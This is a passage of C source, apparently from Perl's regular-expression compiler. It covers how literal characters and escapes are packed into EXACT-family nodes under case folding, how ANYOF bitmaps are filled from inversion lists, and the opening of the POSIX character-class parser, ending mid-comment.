if (RExC_parse < RExC_end)
goto tryagain;
}
*/
/* FALLTHROUGH */
default:
defchar: {
/* Here, we have determined that the next thing is probably a
* literal character. RExC_parse points to the first byte of its
* definition. (It still may be an escape sequence that evaluates
* to a single character) */
STRLEN len = 0;
UV ender = 0;
char *p;
char *s;
/* This allows us to fill a node with just enough spare room so that if the
* final character folds, its expansion is guaranteed to fit */
#define MAX_NODE_STRING_SIZE (255-UTF8_MAXBYTES_CASE)
char *s0;
U8 upper_parse = MAX_NODE_STRING_SIZE;
/* We start out as an EXACT node, even if under /i, until we find a
* character which is in a fold. The algorithm now segregates into
* separate nodes, characters that fold from those that don't under
* /i. (This hopefully will create nodes that are fixed strings
* even under /i, giving the optimizer something to grab on to.)
* So, if a node has something in it and the next character is in
* the opposite category, that node is closed up, and the function
* returns. Then regatom is called again, and a new node is
* created for the new category. */
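/* So, roughly, a run like "abc--def" under /i should end up as a
* folding node for "abc", a plain EXACT node for "--" (hyphens
* participate in no fold), and another folding node for "def". */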
U8 node_type = EXACT;
/* Assume the node will be fully used; the excess is given back at
* the end. We can't make any other length assumptions, as a byte
* input sequence could shrink down. */
Ptrdiff_t initial_size = STR_SZ(256);
bool next_is_quantifier;
char * oldp = NULL;
/* We can convert EXACTF nodes to EXACTFU if they contain only
* characters that match identically regardless of the target
* string's UTF8ness. The reason to do this is that EXACTF is not
* trie-able, EXACTFU is, and EXACTFU requires fewer operations at
* runtime.
*
* Similarly, we can convert EXACTFL nodes to EXACTFLU8 if they
* contain only above-Latin1 characters (hence must be in UTF8),
* which don't participate in folds with Latin1-range characters,
* as the latter's folds aren't known until runtime. */
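/* For example, under /di a node holding just "foo" can safely become an
* EXACTFU node, since neither 'f' nor 'o' matches differently depending
* on whether the target string is in UTF-8; but a node that begins or
* ends with 's', or that contains LATIN SMALL LETTER SHARP S, needs the
* special handling further below. */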
bool maybe_exactfu = FOLD && (DEPENDS_SEMANTICS || LOC);
/* Single-character EXACTish nodes are almost always SIMPLE. This
* allows us to override this as encountered */
U8 maybe_SIMPLE = SIMPLE;
/* Does this node contain something that can't match unless the
* target string is (also) in UTF-8 */
bool requires_utf8_target = FALSE;
/* The sequence 'ss' is problematic in non-UTF-8 patterns. */
bool has_ss = FALSE;
/* So is the MICRO SIGN */
bool has_micro_sign = FALSE;
/* Allocate an EXACT node. The node_type may change below to
* another EXACTish node, but since the size of the node doesn't
* change, it works */
ret = regnode_guts(pRExC_state, node_type, initial_size, "exact");
FILL_NODE(ret, node_type);
RExC_emit++;
s = STRING(REGNODE_p(ret));
s0 = s;
reparse:
/* This breaks under rare circumstances. If folding, we do not
* want to split a node at a character that is non-final in a
* multi-char fold, as an input string could just happen to want to
* match across the node boundary. The code at the end of the loop
* looks for this, and backs off until it finds a character that
* isn't such a non-final one, but it is possible (though extremely,
* extremely unlikely) for all characters in the node to be non-final
* fold ones, in which case we just leave the node fully filled, and
* hope that it doesn't match the string in just the wrong place */
assert( ! UTF /* Is at the beginning of a character */
|| UTF8_IS_INVARIANT(UCHARAT(RExC_parse))
|| UTF8_IS_START(UCHARAT(RExC_parse)));
/* Here, we have a literal character. Find the maximal string of
* them in the input that we can fit into a single EXACTish node.
* We quit at the first non-literal or when the node gets full, or
* under /i the categorization of folding/non-folding character
* changes */
for (p = RExC_parse; len < upper_parse && p < RExC_end; ) {
/* In most cases each iteration adds one byte to the output.
* The exceptions override this */
Size_t added_len = 1;
oldp = p;
/* White space has already been ignored */
assert( (RExC_flags & RXf_PMf_EXTENDED) == 0
|| ! is_PATWS_safe((p), RExC_end, UTF));
switch ((U8)*p) {
case '^':
case '$':
case '.':
case '[':
case '(':
case ')':
case '|':
goto loopdone;
case '\\':
/* Literal Escapes Switch
This switch is meant to handle escape sequences that
resolve to a literal character.
Every escape sequence that represents something
else, like an assertion or a char class, is handled
in the switch marked 'Special Escapes' above in this
routine, but also has an entry here as anything that
isn't explicitly mentioned here will be treated as
an unescaped equivalent literal.
*/
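/* For instance, "\n" below resolves to a literal newline and is
appended to this EXACTish node, whereas "\d" is one of the special
escapes, so we stop the literal run here and let the 'Special
Escapes' switch earlier in this routine handle it on the next call.
*/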
switch ((U8)*++p) {
/* These are all the special escapes. */
case 'A': /* Start assertion */
case 'b': case 'B': /* Word-boundary assertion*/
case 'C': /* Single char !DANGEROUS! */
case 'd': case 'D': /* digit class */
case 'g': case 'G': /* generic-backref, pos assertion */
case 'h': case 'H': /* HORIZWS */
case 'k': case 'K': /* named backref, keep marker */
case 'p': case 'P': /* Unicode property */
case 'R': /* LNBREAK */
case 's': case 'S': /* space class */
case 'v': case 'V': /* VERTWS */
case 'w': case 'W': /* word class */
case 'X': /* eXtended Unicode "combining
character sequence" */
case 'z': case 'Z': /* End of line/string assertion */
--p;
goto loopdone;
/* Anything after here is an escape that resolves to a
literal. (Except digits, which may or may not)
*/
case 'n':
ender = '\n';
p++;
break;
case 'N': /* Handle a single-code point named character. */
RExC_parse = p + 1;
if (! grok_bslash_N(pRExC_state,
NULL, /* Fail if evaluates to
anything other than a
single code point */
&ender, /* The returned single code
point */
NULL, /* Don't need a count of
how many code points */
flagp,
RExC_strict,
depth)
) {
if (*flagp & NEED_UTF8)
FAIL("panic: grok_bslash_N set NEED_UTF8");
RETURN_FAIL_ON_RESTART_FLAGP(flagp);
/* Here, it wasn't a single code point. Go close
* up this EXACTish node. The switch() prior to
* this switch handles the other cases */
RExC_parse = p = oldp;
goto loopdone;
}
p = RExC_parse;
RExC_parse = parse_start;
/* The \N{} means the pattern, if previously /d,
* becomes /u. That means it can't be an EXACTF node,
* but an EXACTFU */
if (node_type == EXACTF) {
node_type = EXACTFU;
/* If the node already contains something that
* differs between EXACTF and EXACTFU, reparse it
* as EXACTFU */
if (! maybe_exactfu) {
len = 0;
s = s0;
goto reparse;
}
}
break;
case 'r':
ender = '\r';
p++;
break;
case 't':
ender = '\t';
p++;
break;
case 'f':
ender = '\f';
p++;
break;
case 'e':
ender = ESC_NATIVE;
p++;
break;
case 'a':
ender = '\a';
p++;
break;
case 'o':
{
UV result;
const char* error_msg;
bool valid = grok_bslash_o(&p,
RExC_end,
&result,
&error_msg,
TO_OUTPUT_WARNINGS(p),
(bool) RExC_strict,
TRUE, /* Output warnings
for non-
portables */
UTF);
if (! valid) {
RExC_parse = p; /* going to die anyway; point
to exact spot of failure */
vFAIL(error_msg);
}
UPDATE_WARNINGS_LOC(p - 1);
ender = result;
break;
}
case 'x':
{
UV result = UV_MAX; /* initialize to erroneous
value */
const char* error_msg;
bool valid = grok_bslash_x(&p,
RExC_end,
&result,
&error_msg,
TO_OUTPUT_WARNINGS(p),
(bool) RExC_strict,
TRUE, /* Silence warnings
for non-
portables */
UTF);
if (! valid) {
RExC_parse = p; /* going to die anyway; point
to exact spot of failure */
vFAIL(error_msg);
}
UPDATE_WARNINGS_LOC(p - 1);
ender = result;
if (ender < 0x100) {
#ifdef EBCDIC
if (RExC_recode_x_to_native) {
ender = LATIN1_TO_NATIVE(ender);
}
#endif
}
break;
}
case 'c':
p++;
ender = grok_bslash_c(*p, TO_OUTPUT_WARNINGS(p));
UPDATE_WARNINGS_LOC(p);
p++;
break;
case '8': case '9': /* must be a backreference */
--p;
/* we have an escape like \8 which cannot be an octal escape
* so we exit the loop, and let the outer loop handle this
* escape which may or may not be a legitimate backref. */
goto loopdone;
case '1': case '2': case '3':case '4':
case '5': case '6': case '7':
/* When we parse backslash escapes there is ambiguity
* between backreferences and octal escapes. Any escape
* from \1 - \9 is a backreference, any multi-digit
* escape which does not start with 0 and which when
* evaluated as decimal could refer to an already
* parsed capture buffer is a back reference. Anything
* else is octal.
*
* Note this implies that \118 could be interpreted as
* 118 OR as "\11" . "8" depending on whether there
* were 118 capture buffers defined already in the
* pattern. */
/* NOTE, RExC_npar is 1 more than the actual number of
* parens we have seen so far, hence the "<" as opposed
* to "<=" */
if ( !isDIGIT(p[1]) || S_backref_value(p, RExC_end) < RExC_npar)
{ /* Not to be treated as an octal constant, go
find backref */
--p;
goto loopdone;
}
/* FALLTHROUGH */
case '0':
{
I32 flags = PERL_SCAN_SILENT_ILLDIGIT;
STRLEN numlen = 3;
ender = grok_oct(p, &numlen, &flags, NULL);
p += numlen;
if ( isDIGIT(*p) /* like \08, \178 */
&& ckWARN(WARN_REGEXP)
&& numlen < 3)
{
reg_warn_non_literal_string(
p + 1,
form_short_octal_warning(p, numlen));
}
}
break;
case '\0':
if (p >= RExC_end)
FAIL("Trailing \\");
/* FALLTHROUGH */
default:
if (isALPHANUMERIC(*p)) {
/* An alpha followed by '{' is going to fail next
* iteration, so don't output this warning in that
* case */
if (! isALPHA(*p) || *(p + 1) != '{') {
ckWARN2reg(p + 1, "Unrecognized escape \\%.1s"
" passed through", p);
}
}
goto normal_default;
} /* End of switch on '\' */
break;
case '{':
/* Trying to gain new uses for '{' without breaking too
* much existing code is hard. The solution currently
* adopted is:
* 1) If there is no ambiguity that a '{' should always
* be taken literally, at the start of a construct, we
* just do so.
* 2) If the literal '{' conflicts with our desired use
* of it as a metacharacter, we die. The deprecation
* cycles for this have come and gone.
* 3) If there is ambiguity, we raise a simple warning.
* This could happen, for example, if the user
* intended it to introduce a quantifier, but slightly
* misspelled the quantifier. Without this warning,
* the quantifier would silently be taken as a literal
* string of characters instead of a meta construct */
if (len || (p > RExC_start && isALPHA_A(*(p - 1)))) {
if ( RExC_strict
|| ( p > parse_start + 1
&& isALPHA_A(*(p - 1))
&& *(p - 2) == '\\')
|| new_regcurly(p, RExC_end))
{
RExC_parse = p + 1;
vFAIL("Unescaped left brace in regex is "
"illegal here");
}
ckWARNreg(p + 1, "Unescaped left brace in regex is"
" passed through");
}
goto normal_default;
case '}':
case ']':
if (p > RExC_parse && RExC_strict) {
ckWARN2reg(p + 1, "Unescaped literal '%c'", *p);
}
/*FALLTHROUGH*/
default: /* A literal character */
normal_default:
if (! UTF8_IS_INVARIANT(*p) && UTF) {
STRLEN numlen;
ender = utf8n_to_uvchr((U8*)p, RExC_end - p,
&numlen, UTF8_ALLOW_DEFAULT);
p += numlen;
}
else
ender = (U8) *p++;
break;
} /* End of switch on the literal */
/* Here, have looked at the literal character, and <ender>
* contains its ordinal; <p> points to the character after it.
* */
if (ender > 255) {
REQUIRE_UTF8(flagp);
}
/* We need to check if the next non-ignored thing is a
* quantifier. Move <p> to after anything that should be
* ignored, which, as a side effect, positions <p> for the next
* loop iteration */
skip_to_be_ignored_text(pRExC_state, &p,
FALSE /* Don't force to /x */ );
/* If the next thing is a quantifier, it applies to this
* character only, which means that this character has to be in
* its own node and can't just be appended to the string in an
* existing node, so if there are already other characters in
* the node, close the node with just them, and set up to do
* this character again next time through, when it will be the
* only thing in its new node */
next_is_quantifier = LIKELY(p < RExC_end)
&& UNLIKELY(ISMULT2(p));
if (next_is_quantifier && LIKELY(len)) {
p = oldp;
goto loopdone;
}
/* Ready to add 'ender' to the node */
if (! FOLD) { /* The simple case, just append the literal */
not_fold_common:
if (UVCHR_IS_INVARIANT(ender) || ! UTF) {
*(s++) = (char) ender;
}
else {
U8 * new_s = uvchr_to_utf8((U8*)s, ender);
added_len = (char *) new_s - s;
s = (char *) new_s;
if (ender > 255) {
requires_utf8_target = TRUE;
}
}
}
else if (LOC && is_PROBLEMATIC_LOCALE_FOLD_cp(ender)) {
/* Here we are folding under /l, and the code point is
* problematic. If this is the first character in the
* node, change the node type to folding. Otherwise, if
* this is the first problematic character, close up the
* existing node, so can start a new node with this one */
if (! len) {
node_type = EXACTFL;
RExC_contains_locale = 1;
}
else if (node_type == EXACT) {
p = oldp;
goto loopdone;
}
/* This problematic code point means we can't simplify
* things */
maybe_exactfu = FALSE;
/* Here, we are adding a problematic fold character.
* "Problematic" in this context means that its fold isn't
* known until runtime. (The non-problematic code points
* are the above-Latin1 ones that fold to also all
* above-Latin1. Their folds don't vary no matter what the
* locale is.) But here we have characters whose fold
* depends on the locale. We just add in the unfolded
* character, and wait until runtime to fold it */
goto not_fold_common;
}
else /* regular fold; see if actually is in a fold */
if ( (ender < 256 && ! IS_IN_SOME_FOLD_L1(ender))
|| (ender > 255
&& ! _invlist_contains_cp(PL_in_some_fold, ender)))
{
/* Here, folding, but the character isn't in a fold.
*
* Start a new node if previous characters in the node were
* folded */
if (len && node_type != EXACT) {
p = oldp;
goto loopdone;
}
/* Here, continuing a node with non-folded characters. Add
* this one */
goto not_fold_common;
}
else { /* Here, does participate in some fold */
/* If this is the first character in the node, change its
* type to folding. Otherwise, if this is the first
* folding character in the node, close up the existing
* node, so can start a new node with this one. */
if (! len) {
node_type = compute_EXACTish(pRExC_state);
}
else if (node_type == EXACT) {
p = oldp;
goto loopdone;
}
if (UTF) { /* Use the folded value */
if (UVCHR_IS_INVARIANT(ender)) {
*(s)++ = (U8) toFOLD(ender);
}
else {
ender = _to_uni_fold_flags(
ender,
(U8 *) s,
&added_len,
FOLD_FLAGS_FULL | ((ASCII_FOLD_RESTRICTED)
? FOLD_FLAGS_NOMIX_ASCII
: 0));
s += added_len;
if ( ender > 255
&& LIKELY(ender != GREEK_SMALL_LETTER_MU))
{
/* U+B5 folds to the MU, so it's possible for a
* non-UTF-8 target to match it */
requires_utf8_target = TRUE;
}
}
}
else {
/* Here is non-UTF8. First, see if the character's
* fold differs between /d and /u. */
if (PL_fold[ender] != PL_fold_latin1[ender]) {
maybe_exactfu = FALSE;
}
#if UNICODE_MAJOR_VERSION > 3 /* no multifolds in early Unicode */ \
|| (UNICODE_MAJOR_VERSION == 3 && ( UNICODE_DOT_VERSION > 0) \
|| UNICODE_DOT_DOT_VERSION > 0)
/* On non-ancient Unicode versions, this includes the
* multi-char fold SHARP S to 'ss' */
if ( UNLIKELY(ender == LATIN_SMALL_LETTER_SHARP_S)
|| ( isALPHA_FOLD_EQ(ender, 's')
&& len > 0
&& isALPHA_FOLD_EQ(*(s-1), 's')))
{
/* Here, we have one of the following:
* a) a SHARP S. This folds to 'ss' only under
* /u rules. If we are in that situation,
* fold the SHARP S to 'ss'. See the comments
* for join_exact() as to why we fold this
* non-UTF at compile time, and no others.
* b) 'ss'. When under /u, there's nothing
* special needed to be done here. The
* previous iteration handled the first 's',
* and this iteration will handle the second.
* If, on the other hand, it's not /u, we have
* to exclude the possibility of moving to /u,
* so that we won't generate an unwanted
* match, unless, at runtime, the target
* string is in UTF-8.
* */
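/* (Concretely: /ss/i is expected to match a target containing
* LATIN SMALL LETTER SHARP S under /u rules, and /\xDF/i to match
* "ss"; the bookkeeping here is what keeps that working without
* generating unwanted matches under /d on a non-UTF-8 target.) */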
has_ss = TRUE;
maybe_exactfu = FALSE; /* Can't generate an
EXACTFU node (unless we
already are in one) */
if (UNLIKELY(ender == LATIN_SMALL_LETTER_SHARP_S)) {
maybe_SIMPLE = 0;
if (node_type == EXACTFU) {
*(s++) = 's';
/* Let the code below add in the extra 's' */
ender = 's';
added_len = 2;
}
}
}
#endif
else if (UNLIKELY(ender == MICRO_SIGN)) {
has_micro_sign = TRUE;
}
*(s++) = (DEPENDS_SEMANTICS)
? (char) toFOLD(ender)
/* Under /u, the fold of any character in
* the 0-255 range happens to be its
* lowercase equivalent, except for LATIN
* SMALL LETTER SHARP S, which was handled
* above, and the MICRO SIGN, whose fold
* requires UTF-8 to represent. */
: (char) toLOWER_L1(ender);
}
} /* End of adding current character to the node */
len += added_len;
if (next_is_quantifier) {
/* Here, the next input is a quantifier, and to get here,
* the current character is the only one in the node. */
goto loopdone;
}
} /* End of loop through literal characters */
/* Here we have either exhausted the input or run out of room in
* the node. (If we encountered a character that can't be in the
* node, transfer is made directly to <loopdone>, and so we
* wouldn't have fallen off the end of the loop.) In the latter
* case, we artificially have to split the node into two, because
* we just don't have enough space to hold everything. This
* creates a problem if the final character participates in a
* multi-character fold in the non-final position, as a match that
* should have occurred won't, due to the way nodes are matched,
* and our artificial boundary. So back off until we find a non-
* problematic character -- one that isn't at the beginning or
* middle of such a fold. (Either it doesn't participate in any
* folds, or appears only in the final position of all the folds it
* does participate in.) A better solution with far fewer false
* positives, and that would fill the nodes more completely, would
* be to actually have available all the multi-character folds to
* test against, and to back-off only far enough to be sure that
* this node isn't ending with a partial one. <upper_parse> is set
* further below (if we need to reparse the node) to include just
* up through that final non-problematic character that this code
* identifies, so when it is set to less than the full node, we can
* skip the rest of this */
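/* A concrete instance of the problem described above: U+FB00 (LATIN
* SMALL LIGATURE FF) folds to "ff", so if a full node ended with a
* lone 'f' and the following 'f' started a new node, a target string
* containing U+FB00 could fail to match /ff/i across that artificial
* boundary. */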
if (FOLD && p < RExC_end && upper_parse == MAX_NODE_STRING_SIZE) {
PERL_UINT_FAST8_T backup_count = 0;
const STRLEN full_len = len;
assert(len >= MAX_NODE_STRING_SIZE);
/* Here, <s> points to just beyond where we have output the
* final character of the node. Look backwards through the
* string until we find a non-problematic character */
if (! UTF) {
/* This has no multi-char folds to non-UTF characters */
if (ASCII_FOLD_RESTRICTED) {
goto loopdone;
}
while (--s >= s0 && IS_NON_FINAL_FOLD(*s)) {
backup_count++;
}
len = s - s0 + 1;
}
else {
/* Point to the first byte of the final character */
s = (char *) utf8_hop_back((U8 *) s, -1, (U8 *) s0);
while (s >= s0) { /* Search backwards until we find
a non-problematic char */
if (UTF8_IS_INVARIANT(*s)) {
/* There are no ascii characters that participate
* in multi-char folds under /aa. In EBCDIC, the
* non-ascii invariants are all control characters,
* so they never participate in any folds. */
if (ASCII_FOLD_RESTRICTED
|| ! IS_NON_FINAL_FOLD(*s))
{
break;
}
}
else if (UTF8_IS_DOWNGRADEABLE_START(*s)) {
if (! IS_NON_FINAL_FOLD(EIGHT_BIT_UTF8_TO_NATIVE(
*s, *(s+1))))
{
break;
}
}
else if (! _invlist_contains_cp(
PL_NonFinalFold,
valid_utf8_to_uvchr((U8 *) s, NULL)))
{
break;
}
/* Here, the current character is problematic in that
* it does occur in the non-final position of some
* fold, so try the character before it, but have to
* special case the very first byte in the string, so
* we don't read outside the string */
s = (s == s0) ? s -1 : (char *) utf8_hop((U8 *) s, -1);
backup_count++;
} /* End of loop backwards through the string */
/* If there were only problematic characters in the string,
* <s> will point to before s0, in which case the length
* should be 0, otherwise include the length of the
* non-problematic character just found */
len = (s < s0) ? 0 : s - s0 + UTF8SKIP(s);
}
/* Here, have found the final character, if any, that is
* non-problematic as far as ending the node without splitting
* it across a potential multi-char fold. <len> contains the
* number of bytes in the node up-to and including that
* character, or is 0 if there is no such character, meaning
* the whole node contains only problematic characters. In
* this case, give up and just take the node as-is. We can't
* do any better */
if (len == 0) {
len = full_len;
} else {
/* Here, the node does contain some characters that aren't
* problematic. If we didn't have to backup any, then the
* final character in the node is non-problematic, and we
* can take the node as-is */
if (backup_count == 0) {
goto loopdone;
}
else if (backup_count == 1) {
/* If the final character is problematic, but the
* penultimate is not, back-off that last character to
* later start a new node with it */
p = oldp;
goto loopdone;
}
/* Here, the final non-problematic character is earlier
* in the input than the penultimate character. What we do
* is reparse from the beginning, going up only as far as
* this final ok one, thus guaranteeing that the node ends
* in an acceptable character. The reason we reparse is
* that we know how far in the character is, but we don't
* know how to correlate its position with the input parse.
* An alternate implementation would be to build that
* correlation as we go along during the original parse,
* but that would entail extra work for every node, whereas
* this code gets executed only when the string is too
* large for the node, and the final two characters are
* problematic, an infrequent occurrence. Yet another
* possible strategy would be to save the tail of the
* string, and the next time regatom is called, initialize
* with that. The problem with this is that unless you
* back off one more character, you won't be guaranteed
* regatom will get called again, unless regbranch,
* regpiece ... are also changed. If you do back off that
* extra character, so that there is input guaranteed to
* force calling regatom, you can't handle the case where
* just the first character in the node is acceptable. I
* (khw) decided to try this method which doesn't have that
* pitfall; if performance issues are found, we can do a
* combination of the current approach plus that one */
upper_parse = len;
len = 0;
s = s0;
goto reparse;
}
} /* End of verifying node ends with an appropriate char */
loopdone: /* Jumped to when encounters something that shouldn't be
in the node */
/* Free up any over-allocated space; cast is to silence bogus
* warning in MS VC */
change_engine_size(pRExC_state,
- (Ptrdiff_t) (initial_size - STR_SZ(len)));
/* I (khw) don't know if you can get here with zero length, but the
* old code handled this situation by creating a zero-length EXACT
* node. Might as well be NOTHING instead */
if (len == 0) {
OP(REGNODE_p(ret)) = NOTHING;
}
else {
/* If the node type is EXACT here, check to see if it
* should be EXACTL, or EXACT_ONLY8. */
if (node_type == EXACT) {
if (LOC) {
node_type = EXACTL;
}
else if (requires_utf8_target) {
node_type = EXACT_ONLY8;
}
} else if (FOLD) {
if ( UNLIKELY(has_micro_sign || has_ss)
&& (node_type == EXACTFU || ( node_type == EXACTF
&& maybe_exactfu)))
{ /* These two conditions are problematic in non-UTF-8
EXACTFU nodes. */
assert(! UTF);
node_type = EXACTFUP;
}
else if (node_type == EXACTFL) {
/* 'maybe_exactfu' is deliberately set above to
* indicate this node type, where all code points in it
* are above 255 */
if (maybe_exactfu) {
node_type = EXACTFLU8;
}
else if (UNLIKELY(
_invlist_contains_cp(PL_HasMultiCharFold, ender)))
{
/* A character that folds to more than one will
* match multiple characters, so can't be SIMPLE.
* We don't have to worry about this with EXACTFLU8
* nodes just above, as they have already been
* folded (since the fold doesn't vary at run
* time). Here, if the final character in the node
* folds to multiple, it can't be simple. (This
* only has an effect if the node has only a single
* character, hence the final one, as elsewhere we
* turn off simple for nodes whose length > 1.) */
maybe_SIMPLE = 0;
}
}
else if (node_type == EXACTF) { /* Means is /di */
/* If 'maybe_exactfu' is clear, then we need to stay
* /di. If it is set, it means there are no code
* points that match differently depending on UTF8ness
* of the target string, so it can become an EXACTFU
* node */
if (! maybe_exactfu) {
RExC_seen_d_op = TRUE;
}
else if ( isALPHA_FOLD_EQ(* STRING(REGNODE_p(ret)), 's')
|| isALPHA_FOLD_EQ(ender, 's'))
{
/* But, if the node begins or ends in an 's' we
* have to defer changing it into an EXACTFU, as
* the node could later get joined with another one
* that ends or begins with 's' creating an 'ss'
* sequence which would then wrongly match the
* sharp s without the target being UTF-8. We
* create a special node that we resolve later when
* we join nodes together */
node_type = EXACTFU_S_EDGE;
}
else {
node_type = EXACTFU;
}
}
if (requires_utf8_target && node_type == EXACTFU) {
node_type = EXACTFU_ONLY8;
}
}
OP(REGNODE_p(ret)) = node_type;
STR_LEN(REGNODE_p(ret)) = len;
RExC_emit += STR_SZ(len);
/* If the node isn't a single character, it can't be SIMPLE */
if (len > (Size_t) ((UTF) ? UVCHR_SKIP(ender) : 1)) {
maybe_SIMPLE = 0;
}
*flagp |= HASWIDTH | maybe_SIMPLE;
}
Set_Node_Length(REGNODE_p(ret), p - parse_start - 1);
RExC_parse = p;
{
/* len is STRLEN which is unsigned, need to copy to signed */
IV iv = len;
if (iv < 0)
vFAIL("Internal disaster");
}
} /* End of label 'defchar:' */
break;
} /* End of giant switch on input character */
/* Position parse to next real character */
skip_to_be_ignored_text(pRExC_state, &RExC_parse,
FALSE /* Don't force to /x */ );
if ( *RExC_parse == '{'
&& OP(REGNODE_p(ret)) != SBOL && ! regcurly(RExC_parse))
{
if (RExC_strict || new_regcurly(RExC_parse, RExC_end)) {
RExC_parse++;
vFAIL("Unescaped left brace in regex is illegal here");
}
ckWARNreg(RExC_parse + 1, "Unescaped left brace in regex is"
" passed through");
}
return(ret);
}
STATIC void
S_populate_ANYOF_from_invlist(pTHX_ regnode *node, SV** invlist_ptr)
{
/* Uses the inversion list '*invlist_ptr' to populate the ANYOF 'node'. It
* sets up the bitmap and any flags, removing those code points from the
* inversion list, setting it to NULL should it become completely empty */
dVAR;
PERL_ARGS_ASSERT_POPULATE_ANYOF_FROM_INVLIST;
assert(PL_regkind[OP(node)] == ANYOF);
/* There is no bitmap for this node type */
if (OP(node) == ANYOFH) {
return;
}
ANYOF_BITMAP_ZERO(node);
if (*invlist_ptr) {
/* This gets set if we actually need to modify things */
bool change_invlist = FALSE;
UV start, end;
/* Start looking through *invlist_ptr */
invlist_iterinit(*invlist_ptr);
while (invlist_iternext(*invlist_ptr, &start, &end)) {
UV high;
int i;
if (end == UV_MAX && start <= NUM_ANYOF_CODE_POINTS) {
ANYOF_FLAGS(node) |= ANYOF_MATCHES_ALL_ABOVE_BITMAP;
}
/* Quit if are above what we should change */
if (start >= NUM_ANYOF_CODE_POINTS) {
break;
}
change_invlist = TRUE;
/* Set all the bits in the range, up to the max that we are doing */
high = (end < NUM_ANYOF_CODE_POINTS - 1)
? end
: NUM_ANYOF_CODE_POINTS - 1;
for (i = start; i <= (int) high; i++) {
if (! ANYOF_BITMAP_TEST(node, i)) {
ANYOF_BITMAP_SET(node, i);
}
}
}
invlist_iterfinish(*invlist_ptr);
/* Done with loop; remove any code points that are in the bitmap from
* *invlist_ptr; similarly for code points above the bitmap if we have
* a flag to match all of them anyway */
if (change_invlist) {
_invlist_subtract(*invlist_ptr, PL_InBitmap, invlist_ptr);
}
if (ANYOF_FLAGS(node) & ANYOF_MATCHES_ALL_ABOVE_BITMAP) {
_invlist_intersection(*invlist_ptr, PL_InBitmap, invlist_ptr);
}
/* If have completely emptied it, remove it completely */
if (_invlist_len(*invlist_ptr) == 0) {
SvREFCNT_dec_NN(*invlist_ptr);
*invlist_ptr = NULL;
}
}
}
/* Parse POSIX character classes: [[:foo:]], [[=foo=]], [[.foo.]].
Character classes ([:foo:]) can also be negated ([:^foo:]).
Returns a named class id (ANYOF_XXX) if successful, -1 otherwise.
Equivalence classes ([=foo=]) and composites ([.foo.]) are parsed,
but trigger failures because they are currently unimplemented. */
#define POSIXCC_DONE(c) ((c) == ':')
#define POSIXCC_NOTYET(c) ((c) == '=' || (c) == '.')
#define POSIXCC(c) (POSIXCC_DONE(c) || POSIXCC_NOTYET(c))
#define MAYBE_POSIXCC(c) (POSIXCC(c) || (c) == '^' || (c) == ';')
#define WARNING_PREFIX "Assuming NOT a POSIX class since "
#define NO_BLANKS_POSIX_WARNING "no blanks are allowed in one"
#define SEMI_COLON_POSIX_WARNING "a semi-colon was found instead of a colon"
#define NOT_MEANT_TO_BE_A_POSIX_CLASS (OOB_NAMEDCLASS - 1)
/* 'posix_warnings' and 'warn_text' are names of variables in the following
* routine. q.v. */
#define ADD_POSIX_WARNING(p, text) STMT_START { \
if (posix_warnings) { \
if (! RExC_warn_text ) RExC_warn_text = \
(AV *) sv_2mortal((SV *) newAV()); \
av_push(RExC_warn_text, Perl_newSVpvf(aTHX_ \
WARNING_PREFIX \
text \
REPORT_LOCATION, \
REPORT_LOCATION_ARGS(p))); \
} \
} STMT_END
#define CLEAR_POSIX_WARNINGS() \
STMT_START { \
if (posix_warnings && RExC_warn_text) \
av_clear(RExC_warn_text); \
} STMT_END
#define CLEAR_POSIX_WARNINGS_AND_RETURN(ret) \
STMT_START { \
CLEAR_POSIX_WARNINGS(); \
return ret; \
} STMT_END
STATIC int
S_handle_possible_posix(pTHX_ RExC_state_t *pRExC_state,
const char * const s, /* Where the putative posix class begins.
Normally, this is one past the '['. This
parameter exists so it can be somewhere
besides RExC_parse. */
char ** updated_parse_ptr, /* Where to set the updated parse pointer, or
NULL */
AV ** posix_warnings, /* Where to place any generated warnings, or
NULL */
const bool check_only /* Don't die if error */
)
{
/* This parses what the caller thinks may be one of the three POSIX
* constructs:
* 1) a character class, like [:blank:]
* 2) a collating symbol, like [. .]
* 3) an equivalence class, like [= =]
* In the latter two cases, it croaks if it finds a syntactically legal
* one, as these are not handled by Perl.
*
* The main purpose is to look for a POSIX character class. It returns:
* a) the class number
* if it is a completely syntactically and semantically legal class.
* 'updated_parse_ptr', if not NULL, is set to point to just after the
* closing ']' of the class
* b) OOB_NAMEDCLASS
* if it appears that one of the three POSIX constructs was meant, but
* its specification was somehow defective. 'updated_parse_ptr', if
* not NULL, is set to point to the character just after the end
* character of the class. See below for handling of warnings.
* c) NOT_MEANT_TO_BE_A_POSIX_CLASS
* if it doesn't appear that a POSIX construct was intended.
* 'updated_parse_ptr' is not changed. No warnings nor errors are
* raised.
*
* In b) there may be errors or warnings generated. If 'check_only' is
* TRUE, then any errors are discarded. Warnings are returned to the
* caller via an AV* created into '*posix_warnings' if it is not NULL. If
* instead it is NULL, warnings are suppressed.
*
* The reason for this function, and its complexity is that a bracketed
* character class can contain just about anything. But it's easy to
* mistype the very specific posix class syntax while still yielding a
* valid regular bracketed class, so it silently gets compiled into something
* quite unintended.
*
* The solution adopted here maintains backward compatibility except that
* it adds a warning if it looks like a posix class was intended but
* improperly specified. The warning is not raised unless what is input
* very closely resembles one of the 14 legal posix classes. To do this,
* it uses fuzzy parsing. It calculates how many single-character edits it
* would take to transform what was input into a legal posix class. Only
* if that number is quite small does it think that the intention was a
* posix class. Obviously these are heuristics, and there will be cases
* where it errs on one side or another, and they can be tweaked as
* experience informs.
*
* The syntax for a legal posix class is:
*
* qr/(?xa: \[ : \^? [[:lower:]]{4,6} : \] )/
*
* What this routine considers syntactically to be an intended posix class
* is this (the comments indicate some restrictions that the pattern
* doesn't show):
*
* qr/(?x: \[? # The left bracket, possibly
* # omitted
* \h* # possibly followed by blanks
* (?: \^ \h* )? # possibly a misplaced caret
* [:;]? # The opening class character,
* # possibly omitted. A typo
* # semi-colon can also be used.
* \h*
* \^? # possibly a correctly placed
* # caret, but not if there was also
* # a misplaced one
* \h*
* .{3,15} # The class name. If there are
* # deviations from the legal syntax,
* # its edit distance must be close
* # to a real class name in order
* # for it to be considered to be
* # an intended posix class.
* \h*
* [[:punct:]]? # The closing class character,
* # possibly omitted. If not a colon
* # nor semi colon, the class name
* # must be even closer to a valid
* # one
* \h*
* \]? # The right bracket, possibly
* # omitted.
* )/
*
* In the above, \h must be ASCII-only.
*
* These are heuristics, and can be tweaked as field experience dictates.
* There will be cases when someone didn't intend to specify a posix class
* that this warns as being so. The goal is to minimize these, while
* maximizing the catching of things intended to be a posix class that
* aren't parsed as such.
*/
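/* Illustrative inputs, per the behaviour described above (not
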